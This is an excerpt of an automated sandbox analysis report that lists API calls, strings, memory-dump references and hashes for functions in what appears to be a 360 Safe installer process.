                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 5F52054C
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 5F520554
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,360AsyncHelper,360AsyncHelper,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000), ref: 5F520566
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 5F520573
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModuleWindow$ClassCreateLongRegister_memset
                                                                                                                                                                      • String ID: 0$360AsyncHelper
                                                                                                                                                                      • API String ID: 845610114-1673954876
                                                                                                                                                                      • Opcode ID: d80f4bfd89ac13fde55d367b36ec0ffb81687dfdb26f14b1c4be5a9a9cbbe4f6
                                                                                                                                                                      • Instruction ID: ee10d6cabf475a3ce7a2cf0cefbe2ecf12078b35d9b43c26be2e883effc7ee4d
                                                                                                                                                                      • Opcode Fuzzy Hash: d80f4bfd89ac13fde55d367b36ec0ffb81687dfdb26f14b1c4be5a9a9cbbe4f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C11C3B1C01218ABDB109F9AC9889AFFEFCEF99621B10461FF069E3250D7B455058BA1
                                                                                                                                                                      Function 001CBD58 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40synchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,Q360SafeInstallerMutex,Q360InstallerMainWnd,0024BCC8,?,0017BA36,Q360InstallerMainWnd,360Installer.exe,?), ref: 001CBD68
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 001CBD75
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 001CBD85
                                                                                                                                                                      • FindWindowW.USER32(Q360InstallerMainWnd,00000000), ref: 001CBD92
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0024BCE4,00000000), ref: 001CBDA7
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0024BCE4,?), ref: 001CBDBA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$CloseCreateEnterErrorFindHandleLastLeaveMutexWindow
                                                                                                                                                                      • String ID: Q360InstallerMainWnd$Q360SafeInstallerMutex
                                                                                                                                                                      • API String ID: 3748036984-533925698
                                                                                                                                                                      • Opcode ID: bbadd2051c31261a1eb7b141208d865f2ae6a2e980f7741d65aade1b808fe82a
                                                                                                                                                                      • Instruction ID: a9292d0a772bbcf81b9a496d3579e99e260ad3b9b346da8bab9593c176205d4a
                                                                                                                                                                      • Opcode Fuzzy Hash: bbadd2051c31261a1eb7b141208d865f2ae6a2e980f7741d65aade1b808fe82a
                                                                                                                                                                      • Instruction Fuzzy Hash: C1F06D32100204ABDB20ABA0EC4AFEE7768EB65714F014468E813E2190EB7099008661
                                                                                                                                                                      Function 5F51FF7E Relevance: 13.8, APIs: 9, Instructions: 287networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 5F51FFAB
                                                                                                                                                                      • WSAGetLastError.WS2_32(4004667F,?), ref: 5F520063
                                                                                                                                                                      • WSAGetLastError.WS2_32(4004667F,?), ref: 5F52009F
                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 5F52028A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastWindow$LongProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2699195558-0
                                                                                                                                                                      • Opcode ID: 1c688cdf6d9af7826e7141126a14ad53543929d9e7d291c3f00f70d6974f0bb3
                                                                                                                                                                      • Instruction ID: af423253a6afb38dc354587af43c1962506c8ffa1164745be561760d80c4db0d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c688cdf6d9af7826e7141126a14ad53543929d9e7d291c3f00f70d6974f0bb3
                                                                                                                                                                      • Instruction Fuzzy Hash: 96A1F4F16072059FE7049B64C988EAEBBE5AF44324F104B3AE856DB1C6D774F941CB90
                                                                                                                                                                      Function 5F508BCB Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 219networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?), ref: 5F508E00
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F508E5B
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F508E63
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F508E6B
                                                                                                                                                                        • Part of subcall function 5F513F7C: _memset.LIBCMT ref: 5F513FAF
                                                                                                                                                                        • Part of subcall function 5F513F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F513FCA
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.%3d] OnClose_Receive Date tail_len = %d, xrefs: 5F508CA8
                                                                                                                                                                      • [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u, xrefs: 5F508D69
                                                                                                                                                                      • [%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms, xrefs: 5F508E1B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$ErrorLast_memsetwvnsprintf
                                                                                                                                                                      • String ID: [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u$[%d.%3d] OnClose_Receive Date tail_len = %d$[%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms
                                                                                                                                                                      • API String ID: 1507222378-1900711150
                                                                                                                                                                      • Opcode ID: f6491a6aa50ae4ae7d9b58522ec67ae0d43ea35a837fc9a8ce7f4efd8f83eaba
                                                                                                                                                                      • Instruction ID: b5938ad61f08a90acb78a9b58cd7dd002b6da77331bd378dba31efb9a2683169
                                                                                                                                                                      • Opcode Fuzzy Hash: f6491a6aa50ae4ae7d9b58522ec67ae0d43ea35a837fc9a8ce7f4efd8f83eaba
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B911CB2500B04AFD725EBA4C994FEBB7EAFF58311F04492DE66A97251DB30B504CB50
                                                                                                                                                                      Function 001E2420 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,0024CDA4,?,?), ref: 001E2492
                                                                                                                                                                      • _memset.LIBCMT ref: 001E24BF
                                                                                                                                                                      • _strncpy.LIBCMT ref: 001E24FB
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 001E2531
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E259B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset_strncpy_vswprintf_s
                                                                                                                                                                      • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                      • API String ID: 170396225-2176293039
                                                                                                                                                                      • Opcode ID: 0f4c09ea51eb89c3ce1a3b66261475e2dd2ef8ce7a77483d70c1db2884686c3e
                                                                                                                                                                      • Instruction ID: cf450fbda6ff2110002ded1e7077d761a620e449a7efad619fa2086dd7b40c27
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4c09ea51eb89c3ce1a3b66261475e2dd2ef8ce7a77483d70c1db2884686c3e
                                                                                                                                                                      • Instruction Fuzzy Hash: 43419BB0608380AAE330DB14AC96BAFB3E8EB98704F00091DF699961C1D7B5A508CB57
                                                                                                                                                                      Function 001D0877 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D0896
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA71F
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA72D
                                                                                                                                                                        • Part of subcall function 001CA6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001CA741
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA754
                                                                                                                                                                        • Part of subcall function 001CA6F2: PathCombineW.SHLWAPI(?,?,?), ref: 001CA784
                                                                                                                                                                        • Part of subcall function 001CA6F2: _wcscat.LIBCMT ref: 001CA796
                                                                                                                                                                        • Part of subcall function 001CA6F2: PathFileExistsW.SHLWAPI(?), ref: 001CA7A4
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000010), ref: 001D0903
                                                                                                                                                                      • _memset.LIBCMT ref: 001D092F
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,00000000,?,?,?), ref: 001D0940
                                                                                                                                                                        • Part of subcall function 001D0691: __EH_prolog3.LIBCMT ref: 001D06B0
                                                                                                                                                                        • Part of subcall function 001D0691: PathFileExistsW.SHLWAPI(?,00000010), ref: 001D06CC
                                                                                                                                                                        • Part of subcall function 001D0691: _memset.LIBCMT ref: 001D070A
                                                                                                                                                                        • Part of subcall function 001D0691: _memset.LIBCMT ref: 001D07B9
                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?,?,{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,00000000,?,?,?), ref: 001D096E
                                                                                                                                                                        • Part of subcall function 001D0426: SetupIterateCabinetW.SETUPAPI(00000000,00000000,001D0376,00000000), ref: 001D0454
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 001D09A7
                                                                                                                                                                      Strings
                                                                                                                                                                      • {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp, xrefs: 001D0952
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Path$File$DeleteExistsH_prolog3Temp$CabinetCombineCreateDirectoryIterateSetup_wcscat
                                                                                                                                                                      • String ID: {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
                                                                                                                                                                      • API String ID: 1438429394-342223665
                                                                                                                                                                      • Opcode ID: 7e3cfc62d4ee837c6954766568aa2f33bdc0ec951f86e51b9213c8b639dbaa1d
                                                                                                                                                                      • Instruction ID: 27aea6c3ab3b964c47a041d27dbe24486d2deb4c93daa36bbe379a41725e608a
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e3cfc62d4ee837c6954766568aa2f33bdc0ec951f86e51b9213c8b639dbaa1d
                                                                                                                                                                      • Instruction Fuzzy Hash: 69316571A101499BDB15EFA4DC92BFEB3B8FF28314F104429E615A7281DF345A05DBA1
                                                                                                                                                                      Function 5F4F2364 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 5F4F2387
                                                                                                                                                                        • Part of subcall function 5F52856A: __FF_MSGBANNER.LIBCMT ref: 5F52858D
                                                                                                                                                                        • Part of subcall function 5F52856A: __NMSG_WRITE.LIBCMT ref: 5F528594
                                                                                                                                                                        • Part of subcall function 5F52856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,5F532E8E,00000002,00000001,00000002,?,5F52F8B1,00000018,5F56C4F0,0000000C,5F52F942), ref: 5F5285E1
                                                                                                                                                                      • GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F239D
                                                                                                                                                                      • _malloc.LIBCMT ref: 5F4F23B3
                                                                                                                                                                      • GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F23C8
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F23EF
                                                                                                                                                                      • __snwprintf.LIBCMT ref: 5F4F2416
                                                                                                                                                                        • Part of subcall function 5F5289A5: __lock.LIBCMT ref: 5F5289C3
                                                                                                                                                                        • Part of subcall function 5F5289A5: ___sbh_find_block.LIBCMT ref: 5F5289CE
                                                                                                                                                                        • Part of subcall function 5F5289A5: ___sbh_free_block.LIBCMT ref: 5F5289DD
                                                                                                                                                                        • Part of subcall function 5F5289A5: HeapFree.KERNEL32(00000000,00000002,5F56C288,0000000C,5F52F908,00000000,5F56C4F0,0000000C,5F52F942,00000002,00000830,?,5F537C19,00000004,5F56C818,0000000C), ref: 5F528A0D
                                                                                                                                                                        • Part of subcall function 5F5289A5: GetLastError.KERNEL32(?,5F537C19,00000004,5F56C818,0000000C,5F532ED8,00000002,0000083F,00000000,00000000,00000000,?,5F52F137,00000001,00000214), ref: 5F528A1E
                                                                                                                                                                      Strings
                                                                                                                                                                      • http://wpad.%s/wpad.dat, xrefs: 5F4F240D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapNetworkParams_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock__snwprintf_memset
                                                                                                                                                                      • String ID: http://wpad.%s/wpad.dat
                                                                                                                                                                      • API String ID: 2241623331-1081111291
                                                                                                                                                                      • Opcode ID: aae60984f6fa61a7426b09aa604384d0a3d07811d878356679b2bef7a9258a0e
                                                                                                                                                                      • Instruction ID: 2ce8d0f0e409aefede39f54a3a1437b2aa0506a8feaf1898b260bcfddaa921c8
                                                                                                                                                                      • Opcode Fuzzy Hash: aae60984f6fa61a7426b09aa604384d0a3d07811d878356679b2bef7a9258a0e
                                                                                                                                                                      • Instruction Fuzzy Hash: 5C21F9B19022586BD706D6E48C40EEF73EDEF89611F1041BBE50CD7281DA74AAC547A5
                                                                                                                                                                      Function 001A71E2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001A7216
                                                                                                                                                                      • SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,0024CDA4), ref: 001A7239
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,0024CDA4), ref: 001A7269
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,0024CDA4), ref: 001A7273
                                                                                                                                                                      Strings
                                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 001A722F
                                                                                                                                                                      • Path, xrefs: 001A722A
                                                                                                                                                                      • 360safe.exe, xrefs: 001A725D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$CombineExistsFileValue_memset
                                                                                                                                                                      • String ID: 360safe.exe$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                                                                                                                                                                      • API String ID: 1538502309-1025180333
                                                                                                                                                                      • Opcode ID: b14b54ac6064d616fb0754e8024bcbefebade92358e37fd17f82250d71018e95
                                                                                                                                                                      • Instruction ID: ae621534de97b4baf5a0f574b9bbfa77ce7dca45ba8d9d4c310db4460ce0e6f3
                                                                                                                                                                      • Opcode Fuzzy Hash: b14b54ac6064d616fb0754e8024bcbefebade92358e37fd17f82250d71018e95
                                                                                                                                                                      • Instruction Fuzzy Hash: D3111A71D0411C9BDB21EBE5ED49BEEB7B8AB19704F20412AF911E3182DB715648CB90
                                                                                                                                                                      Function 5F4DA365 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4DA36C
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F4DA376
                                                                                                                                                                        • Part of subcall function 5F4EAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                        • Part of subcall function 5F4D802B: WaitForSingleObject.KERNEL32(?,000000FF), ref: 5F4D8033
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4DA3A9
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4DA3B3
                                                                                                                                                                        • Part of subcall function 5F4DA0F5: __EH_prolog3_GS.LIBCMT ref: 5F4DA0FC
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4DA3C3
                                                                                                                                                                        • Part of subcall function 5F513FED: _memset.LIBCMT ref: 5F514020
                                                                                                                                                                        • Part of subcall function 5F513FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 5F51403B
                                                                                                                                                                      Strings
                                                                                                                                                                      • p2sp.Disk, xrefs: 5F4DA371
                                                                                                                                                                      • [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 5F4DA3DC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$CurrentDispatcherExceptionH_prolog3H_prolog3_ObjectSingleThreadUserWait_memsetwvnsprintf
                                                                                                                                                                      • String ID: [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.Disk
                                                                                                                                                                      • API String ID: 1914228569-2306218905
                                                                                                                                                                      • Opcode ID: ab6af2c27dc664bcf64dfed8af242824fcade74440fa05d2770729840e92a652
                                                                                                                                                                      • Instruction ID: 4497b9e87601af8285eb6515bd1b472c3f8ed370187354062b781c4fd9364526
                                                                                                                                                                      • Opcode Fuzzy Hash: ab6af2c27dc664bcf64dfed8af242824fcade74440fa05d2770729840e92a652
                                                                                                                                                                      • Instruction Fuzzy Hash: 741151B2D11209AFDB00DBE8C954BEEB7B5AF48321F14452AF115E7181C774E6548BA1
                                                                                                                                                                      Function 001B639A Relevance: 12.2, APIs: 8, Instructions: 150windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B63B9
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 001B63D8
                                                                                                                                                                      • _memset.LIBCMT ref: 001B63F9
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,000003FF), ref: 001B640D
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 001B6434
                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001B6449
                                                                                                                                                                      • GetFocus.USER32 ref: 001B6488
                                                                                                                                                                      • SetFocus.USER32(?), ref: 001B64A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
